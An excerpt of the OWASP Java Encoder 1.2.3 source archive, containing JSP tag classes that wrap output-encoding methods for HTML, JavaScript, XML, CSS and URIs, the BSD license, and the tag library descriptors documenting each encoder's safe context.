owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java000066400000000000000000000041321375203724500305700ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform JavaScript encoding. * This wraps the {@link org.owasp.encoder.Encode#forJavaScript(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forJavaScript(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java000066400000000000000000000042741375203724500311530ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag that performs percent-encoding for a component of a URI, such as a query * parameter name or value, path, or query-string. * This wraps the {@link org.owasp.encoder.Encode#forUriComponent(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForUriComponentTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forUriComponent(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java000066400000000000000000000041411375203724500272610ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform percent-encoding of a URL according to RFC 3986. * This wraps the {@link org.owasp.encoder.Encode#forUri(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForUriTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forUri(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java000066400000000000000000000041431375203724500311500ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform XML Attribute Encoding. * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForXmlAttributeTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forXmlAttribute(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java000066400000000000000000000041351375203724500306100ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform XML Comment Encoding. * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForXmlCommentTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forXmlComment(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java000066400000000000000000000041351375203724500306200ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform XML Content Encoding. * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForXmlContentTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forXmlContent(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java000066400000000000000000000040761375203724500272710ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform XML Encoding. * This wraps the {@link org.owasp.encoder.Encode#forXml(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForXmlTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forXml(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/resources/000077500000000000000000000000001375203724500215335ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/main/resources/META-INF/000077500000000000000000000000001375203724500226735ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/main/resources/META-INF/LICENSE000066400000000000000000000027711375203724500237070ustar00rootroot00000000000000Copyright (c) 2015 Jeff Ichnowski All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the OWASP nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.owasp-java-encoder-1.2.3/jsp/src/main/resources/META-INF/java-encoder-advanced.tld000066400000000000000000000605351375203724500275120ustar00rootroot00000000000000 OWASP Java Encoder Project 1.0 java-encoder https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#advanced Encodes data for an XML CDATA section. On the chance that the input contains a terminating "]]&gt;", it will be replaced by &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. As with all XML contexts, characters that are invalid according to the XML specification will be replaced by a space character. Caller must provide the CDATA section boundaries. forCDATA forCDATA org.owasp.encoder.tag.ForCDATATag empty The value to be written out value true true java.lang.String This method encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those methods. forHtmlContent forHtmlContent org.owasp.encoder.tag.ForHtmlContentTag empty value to be written out value true true java.lang.String Encodes for XML and XHTML attribute content. forXmlAttribute forXmlAttribute org.owasp.encoder.tag.ForXmlAttributeTag empty value to be written out value true true java.lang.String Encodes for XML and XHTML. forXml forXml org.owasp.encoder.tag.ForXmlTag empty value to be written out value true true java.lang.String Encodes for a JavaScript string. It is safe for use in HTML script attributes (such as onclick), script blocks, JSON files, and JavaScript source. The caller MUST provide the surrounding quotation characters for the string. Since this performs additional encoding so it can work in all of the JavaScript contexts listed, it may be slightly less efficient then using one of the methods targetted to a specific JavaScript context: forJavaScriptAttribute, forJavaScriptBlock, or forJavaScriptSource. Unless you are interested in saving a few bytes of output or are writing a framework on top of this library, it is recommend that you use this method over the others. forJavaScript forJavaScript org.owasp.encoder.tag.ForJavaScriptTag empty value to be written out value true true java.lang.String This method encodes for JavaScript strings contained within HTML script attributes (such as onclick). It is NOT safe for use in script blocks. The caller MUST provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that / is not escaped. forJavaScriptAttribute forJavaScriptAttribute org.owasp.encoder.tag.ForJavaScriptAttributeTag empty value to be written out value true true java.lang.String This method encodes for JavaScript strings contained within HTML script blocks. It is NOT safe for use in script attributes (such as onclick). The caller must provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String)} with the exception that " and ' are encoded as \" and \' respectively. forJavaScriptBlock forJavaScriptBlock org.owasp.encoder.tag.ForJavaScriptBlockTag empty value to be written out value true true java.lang.String This method encodes for JavaScript strings contained within a JavaScript or JSON file. This method is NOT safe for use in ANY context embedded in HTML. The caller must provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that / and & are not escaped and " and ' are encoded as \" and \' respectively. forJavaScriptSource forJavaScriptSource org.owasp.encoder.tag.ForJavaScriptSourceTag empty value to be written out value true true java.lang.String Encodes for unquoted HTML attribute values. forHtml(String) or forHtmlAttribute(String) should usually be preferred over this method as quoted attributes are XHTML compliant. forHtmlUnquotedAttribute forHtmlUnquotedAttribute org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag empty value to be written out value true true java.lang.String Performs percent-encoding of a URL according to RFC 3986. The provided URL is assumed to a valid URL. This method does not do any checking on the quality or safety of the URL itself. In many applications it may be better to use java.net.URI instead. Note: this is a particularly dangerous context to put untrusted content in, as for example a "javascript:" URL provided by a malicious user would be "properly" escaped, and still execute. forUri forUri org.owasp.encoder.tag.ForUriTag empty value to be written out value true true java.lang.String Encodes for CSS URL contexts. The context must be surrounded by "url()". It is safe for use in both style blocks and attributes in HTML. Note: this does not do any checking on the quality or safety of the URL itself. The caller should insure that the URL is safe for embedding (e.g. input validation) by other means. forCssUrl forCssUrl org.owasp.encoder.tag.ForCssUrlTag empty value to be written out value true true java.lang.String Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. (X)HTML comments may be interpreted by browsers as something other than a comment, typically in vendor specific extensions (e.g. &lt;--if[IE]--&gt;. For (X)HTML it is recommend that unsafe content never be included in a comment. forXmlComment forXmlComment org.owasp.encoder.tag.ForXmlCommentTag empty value to be written out value true true java.lang.String Encodes for HTML text attributes. forHtmlAttribute forHtmlAttribute org.owasp.encoder.tag.ForHtmlAttributeTag empty value to be written out value true true java.lang.String Encodes for (X)HTML text content and text attributes. forHtml forHtml org.owasp.encoder.tag.ForHtmlTag empty value to be written out value true true java.lang.String Encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those methods. forXmlContent forXmlContent org.owasp.encoder.tag.ForXmlContentTag empty value to be written out value true true java.lang.String Performs percent-encoding for a component of a URI, such as a query parameter name or value, path or query-string. In particular this method insures that special characters in the component do not get interpreted as part of another component. forUriComponent forUriComponent org.owasp.encoder.tag.ForUriComponentTag empty value to be written out value true true java.lang.String Encodes for CSS strings. The context must be surrounded by quotation characters. It is safe for use in both style blocks and attributes in HTML. forCssString forCssString org.owasp.encoder.tag.ForCssStringTag empty value to be written out value true true java.lang.String Encodes for (X)HTML text content and text attributes. forHtml forHtml org.owasp.encoder.Encode java.lang.String forHtml(java.lang.String) forHtml(unsafeData) This method encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those methods. forHtmlContent forHtmlContent org.owasp.encoder.Encode java.lang.String forHtmlContent(java.lang.String) forHtmlContent(unsafeData) Encodes for HTML text attributes. forHtmlAttribute org.owasp.encoder.Encode java.lang.String forHtmlAttribute(java.lang.String) forHtmlAttribute(unsafeData) Encodes for unquoted HTML attribute values. forHtml(String) or forHtmlAttribute(String) should usually be preferred over this method as quoted attributes are XHTML compliant. forHtmlUnquotedAttribute forHtmlUnquotedAttribute org.owasp.encoder.Encode java.lang.String forHtmlUnquotedAttribute(java.lang.String) forHtmlUnquotedAttribute(unsafeData) Encodes for CSS strings. The context must be surrounded by quotation characters. It is safe for use in both style blocks and attributes in HTML. forCssString forCssString org.owasp.encoder.Encode java.lang.String forCssString(java.lang.String) forCssString(unsafeData) Encodes for CSS URL contexts. The context must be surrounded by "url()". It is safe for use in both style blocks and attributes in HTML. Note: this does not do any checking on the quality or safety of the URL itself. The caller should insure that the URL is safe for embedding (e.g. input validation) by other means. forCssUrl forCssUrl org.owasp.encoder.Encode java.lang.String forCssUrl(java.lang.String) forCssUrl(unsafeData) Performs percent-encoding of a URL according to RFC 3986. The provided URL is assumed to a valid URL. This method does not do any checking on the quality or safety of the URL itself. In many applications it may be better to use java.net.URI instead. Note: this is a particularly dangerous context to put untrusted content in, as for example a "javascript:" URL provided by a malicious user would be "properly" escaped, and still execute. forUri forUri org.owasp.encoder.Encode java.lang.String forUri(java.lang.String) forUri(unsafeData) Performs percent-encoding for a component of a URI, such as a query parameter name or value, path or query-string. In particular this method insures that special characters in the component do not get interpreted as part of another component. forUriComponent forUriComponent org.owasp.encoder.Encode java.lang.String forUriComponent(java.lang.String) forUriComponent(unsafeData) Encodes for XML and XHTML. forXml forXml org.owasp.encoder.Encode java.lang.String forXml(java.lang.String) forXml(unsafeData) Encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those methods. forXmlContent forXmlContent org.owasp.encoder.Encode java.lang.String forXmlContent(java.lang.String) forXmlContent(unsafeData) Encodes for XML and XHTML attribute content. forXmlAttribute forXmlAttribute org.owasp.encoder.Encode java.lang.String forXmlAttribute(java.lang.String) forXmlAttribute(unsafeData) Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. (X)HTML comments may be interpreted by browsers as something other than a comment, typically in vendor specific extensions (e.g. &lt;--if[IE]--&gt;. For (X)HTML it is recommend that unsafe content never be included in a comment. forXmlComment org.owasp.encoder.Encode java.lang.String forXmlComment(java.lang.String) forXmlComment(unsafeData) Encodes data for an XML CDATA section. On the chance that the input contains a terminating "]]&gt;", it will be replaced by &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. As with all XML contexts, characters that are invalid according to the XML specification will be replaced by a space character. Caller must provide the CDATA section boundaries. forCDATA forCDATA org.owasp.encoder.Encode java.lang.String forCDATA(java.lang.String) forCDATA(unsafeData) Encodes for a JavaScript string. It is safe for use in HTML script attributes (such as onclick), script blocks, JSON files, and JavaScript source. The caller MUST provide the surrounding quotation characters for the string. Since this performs additional encoding so it can work in all of the JavaScript contexts listed, it may be slightly less efficient then using one of the methods targetted to a specific JavaScript context: forJavaScriptAttribute, forJavaScriptBlock, or forJavaScriptSource. Unless you are interested in saving a few bytes of output or are writing a framework on top of this library, it is recommend that you use this method over the others. forJavaScript forJavaScript org.owasp.encoder.Encode java.lang.String forJavaScript(java.lang.String) forJavaScript(unsafeData) This method encodes for JavaScript strings contained within HTML script attributes (such as onclick). It is NOT safe for use in script blocks. The caller MUST provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that / is not escaped. forJavaScriptAttribute forJavaScriptAttribute org.owasp.encoder.Encode java.lang.String forJavaScriptAttribute(java.lang.String) forJavaScriptAttribute(unsafeData) This method encodes for JavaScript strings contained within HTML script blocks. It is NOT safe for use in script attributes (such as onclick). The caller must provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String)} with the exception that " and ' are encoded as \" and \' respectively. forJavaScriptBlock forJavaScriptBlock org.owasp.encoder.Encode java.lang.String forJavaScriptBlock(java.lang.String) forJavaScriptBlock(unsafeData) This method encodes for JavaScript strings contained within a JavaScript or JSON file. This method is NOT safe for use in ANY context embedded in HTML. The caller must provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that / and & are not escaped and " and ' are encoded as \" and \' respectively. forJavaScriptSource forJavaScriptSource org.owasp.encoder.Encode java.lang.String forJavaScriptSource(java.lang.String) <%@page contentType="text/javascript; charset=UTF-8"%> var data = '${forJavaScriptSource(unsafeData)}'; owasp-java-encoder-1.2.3/jsp/src/main/resources/META-INF/java-encoder.tld000066400000000000000000000426131375203724500257440ustar00rootroot00000000000000 OWASP Java Encoder Project 1.0 java-encoder https://www.owasp.org/index.php/OWASP_Java_Encoder_Project Encodes data for an XML CDATA section. On the chance that the input contains a terminating "]]&gt;", it will be replaced by &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. As with all XML contexts, characters that are invalid according to the XML specification will be replaced by a space character. Caller must provide the CDATA section boundaries. forCDATA forCDATA org.owasp.encoder.tag.ForCDATATag empty The value to be written out value true true java.lang.String This method encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those methods. forHtmlContent forHtmlContent org.owasp.encoder.tag.ForHtmlContentTag empty value to be written out value true true java.lang.String Encodes for XML and XHTML attribute content. forXmlAttribute forXmlAttribute org.owasp.encoder.tag.ForXmlAttributeTag empty value to be written out value true true java.lang.String Encodes for XML and XHTML. forXml forXml org.owasp.encoder.tag.ForXmlTag empty value to be written out value true true java.lang.String Encodes for a JavaScript string. It is safe for use in HTML script attributes (such as onclick), script blocks, JSON files, and JavaScript source. The caller MUST provide the surrounding quotation characters for the string. Since this performs additional encoding so it can work in all of the JavaScript contexts listed, it may be slightly less efficient then using one of the methods targetted to a specific JavaScript context: forJavaScriptAttribute, forJavaScriptBlock, or forJavaScriptSource. Unless you are interested in saving a few bytes of output or are writing a framework on top of this library, it is recommend that you use this method over the others. forJavaScript forJavaScript org.owasp.encoder.tag.ForJavaScriptTag empty value to be written out value true true java.lang.String Encodes for unquoted HTML attribute values. forHtml(String) or forHtmlAttribute(String) should usually be preferred over this method as quoted attributes are XHTML compliant. forHtmlUnquotedAttribute forHtmlUnquotedAttribute org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag empty value to be written out value true true java.lang.String Performs percent-encoding of a URL according to RFC 3986. The provided URL is assumed to a valid URL. This method does not do any checking on the quality or safety of the URL itself. In many applications it may be better to use java.net.URI instead. Note: this is a particularly dangerous context to put untrusted content in, as for example a "javascript:" URL provided by a malicious user would be "properly" escaped, and still execute. forUri forUri org.owasp.encoder.tag.ForUriTag empty value to be written out value true true java.lang.String Encodes for CSS URL contexts. The context must be surrounded by "url()". It is safe for use in both style blocks and attributes in HTML. Note: this does not do any checking on the quality or safety of the URL itself. The caller should insure that the URL is safe for embedding (e.g. input validation) by other means. forCssUrl forCssUrl org.owasp.encoder.tag.ForCssUrlTag empty value to be written out value true true java.lang.String Encodes for HTML text attributes. forHtmlAttribute forHtmlAttribute org.owasp.encoder.tag.ForHtmlAttributeTag empty value to be written out value true true java.lang.String Encodes for (X)HTML text content and text attributes. forHtml forHtml org.owasp.encoder.tag.ForHtmlTag empty value to be written out value true true java.lang.String Encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those methods. forXmlContent forXmlContent org.owasp.encoder.tag.ForXmlContentTag empty value to be written out value true true java.lang.String Performs percent-encoding for a component of a URI, such as a query parameter name or value, path or query-string. In particular this method insures that special characters in the component do not get interpreted as part of another component. forUriComponent forUriComponent org.owasp.encoder.tag.ForUriComponentTag empty value to be written out value true true java.lang.String Encodes for CSS strings. The context must be surrounded by quotation characters. It is safe for use in both style blocks and attributes in HTML. forCssString forCssString org.owasp.encoder.tag.ForCssStringTag empty value to be written out value true true java.lang.String Encodes for (X)HTML text content and text attributes. forHtml forHtml org.owasp.encoder.Encode java.lang.String forHtml(java.lang.String) forHtml(unsafeData) This method encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those methods. forHtmlContent forHtmlContent org.owasp.encoder.Encode java.lang.String forHtmlContent(java.lang.String) forHtmlContent(unsafeData) Encodes for HTML text attributes. 